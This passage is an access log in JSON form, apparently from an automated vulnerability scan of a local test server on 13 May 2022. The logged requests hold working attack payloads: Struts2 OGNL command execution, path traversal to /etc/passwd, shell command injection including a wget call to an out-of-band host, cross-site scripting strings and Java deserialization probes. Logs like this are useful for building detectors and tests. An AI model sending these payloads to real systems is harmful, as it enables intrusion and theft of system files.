HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.035","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /bin/wcm/search/gql.json;%0aa.js?query=type:base%20limit:..1&pathPrefix= HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.051","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/embed-swagger/swagger-iframe.php?url=xss://%22-alert(document.domain)-%22 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.054","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.action?action%3A%24%7B%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D%3Dfalse%2C%23f%3D%23%5FmemberAccess.getClass().getDeclaredField(%22allowStaticMethodAccess%22)%2C%23f.setAccessible(true)%2C%23f.set(%23%5FmemberAccess%2Ctrue)%2C%23a%3D%40java.lang.Runtime%40getRuntime().exec(%22sh%20-c%20id%22).getInputStream()%2C%23b%3Dnew%20java.io.InputStreamReader(%23a)%2C%23c%3Dnew%20java.io.BufferedReader(%23b)%2C%23d%3Dnew%20char%5B5000%5D%2C%23c.read(%23d)%2C%23genxor%3D%23context.get(%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22).getWriter()%2C%23genxor.println(%23d)%2C%23genxor.flush()%2C%23genxor.close()%7D HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.056","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /admin/spider.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.050","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.lz HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.058","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/wp-custom-pages/wp-download.php?url=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.056","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /jw/web/; HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.055","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:13 +0000","request_body":"subWidgets[0][template]=widget_php&subWidgets[0][config][code]=phpinfo();","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /ajax/render/widget_tabbedcontainer_tab_panel HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.045","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:13 +0000","request_body":"","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.203","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/elementor/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.200","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /etc.children.json?FNZ.css HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.050","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /plugins/servlet/svnwebclient/commitGraph.jsp?url=%22%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.056","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /plus/download.php?open=1&link=aHR0cHM6Ly9ldmlsLmNvbQo= HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.048","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.action?redirectAction%3A%24%7B%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D%3Dfalse%2C%23f%3D%23%5FmemberAccess.getClass().getDeclaredField(%22allowStaticMethodAccess%22)%2C%23f.setAccessible(true)%2C%23f.set(%23%5FmemberAccess%2Ctrue)%2C%23a%3D%40java.lang.Runtime%40getRuntime().exec(%22sh%20-c%20id%22).getInputStream()%2C%23b%3Dnew%20java.io.InputStreamReader(%23a)%2C%23c%3Dnew%20java.io.BufferedReader(%23b)%2C%23d%3Dnew%20char%5B5000%5D%2C%23c.read(%23d)%2C%23genxor%3D%23context.get(%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22).getWriter()%2C%23genxor.println(%23d)%2C%23genxor.flush()%2C%23genxor.close()%7D HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.045","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /sphider/admin/admin.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.044","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /public/config.js HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.044","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.rar HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.045","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_datafeeds&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.041","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:13 +0000","request_body":"\x0D\x0A\x0D\x0A _CobblerXMLRPCInterface__make_token\x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A cobbler\x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /cobbler_api HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.046","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /etc.children.json?FNZ.ico HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.045","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /plugins/servlet/svnwebclient/error.jsp?errormessage=%27%22%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E&description=test HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.044","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /weibo/topic/%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.039","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /SAPIrExtHelp/random/SAPIrExtHelp/random/%22%3e%3c%53%56%47%20%4f%4e%4c%4f%41%44%3d%26%23%39%37%26%23%31%30%38%26%23%31%30%31%26%23%31%31%34%26%23%31%31%36%28%26%23%78%36%34%26%23%78%36%66%26%23%78%36%33%26%23%78%37%35%26%23%78%36%64%26%23%78%36%35%26%23%78%36%65%26%23%78%37%34%26%23%78%32%65%26%23%78%36%34%26%23%78%36%66%26%23%78%36%64%26%23%78%36%31%26%23%78%36%39%26%23%78%36%65%29%3e.asp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.191","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /config.js HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.037","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.tar.gz HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.039","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/church-admin/includes/validate.php?id=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.051","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /etc.children.json?FNZ.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.047","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /dolibarr/adherents/cartes/carte.php?&mode=cardlogin&foruserlogin=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&model=5160&optioncss=print HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.056","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /plugins/servlet/svnwebclient/statsItem.jsp?url=%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.048","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/ping?count=5&host=;cat%20/etc/passwd;&port=80&source=1.1.1.1&type=icmp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.188","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /log/view?filename=/windows/win.ini&base=../../../../../../../../../../ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.185","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/trafficanalyzer/js/ta_loaded.js.php?aoid=%3Cscript%3Ealert(1)%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.047","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /jsp/help-sb-download.jsp?sbFileName=../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.048","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.xz HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.038","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /tiki-login_scr.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.041","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /etc.children.json/FNZ.css HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.037","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/themes/weekender/friend.php?id=MTA0&link=aHR0cHM6Ly9leGFtcGxlLmNvbQ== HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.037","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wabam HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /sso/UI/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.179","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:13 +0000","request_body":"\xAC\xED\x00\x05sr\x00\x13java.util.ArrayListx\x81\xD2\x1D\x99\xC7a\x9D\x03\x00\x01I\x00\x04sizexp\x00\x00\x00\x02w\x04\x00\x00\x00\x02t\x00\x09element 1t\x00\x09element 2x","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /invoker/JMXInvokerServlet/ HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.036","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /manage/log/view?filename=/etc/passwd&base=../../../../../../../../../../ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.040","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.zip HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.041","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /tiki-login.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.042","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /labkey/__r1/login-login.view?returnUrl=http://example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.045","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /etc.children.json/FNZ.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.039","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.039","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /opensso/UI/Login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.039","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /axis2-web/HappyAxis.jsp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.186","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wabam/favicon.ico HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.041","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:13 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /laravel-graphql-playground HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"1.183","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:13 +0000","request_body":"\xAC\xED\x00\x05sr\x00\x13java.util.ArrayListx\x81\xD2\x1D\x99\xC7a\x9D\x03\x00\x01I\x00\x04sizexp\x00\x00\x00\x02w\x04\x00\x00\x00\x02t\x00\x09element 1t\x00\x09element 2x","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /invoker/EJBInvokerServlet/ HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.049","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /log/view?filename=/etc/passwd&base=../../../../../../../../../../ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.050","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET //uapi-cgi/certmngr.cgi?action=createselfcert&local=anything&country=AA&state=%24(wget%20http://c9v8h8gsmpv8c1qg07h0r7c4udqo89rki.oast.fun)&organization=anything&organizationunit=anything&commonname=anything&days=1&type=anything HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.049","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.z HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.050","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /etc.children.json/FNZ.png HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.049","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} 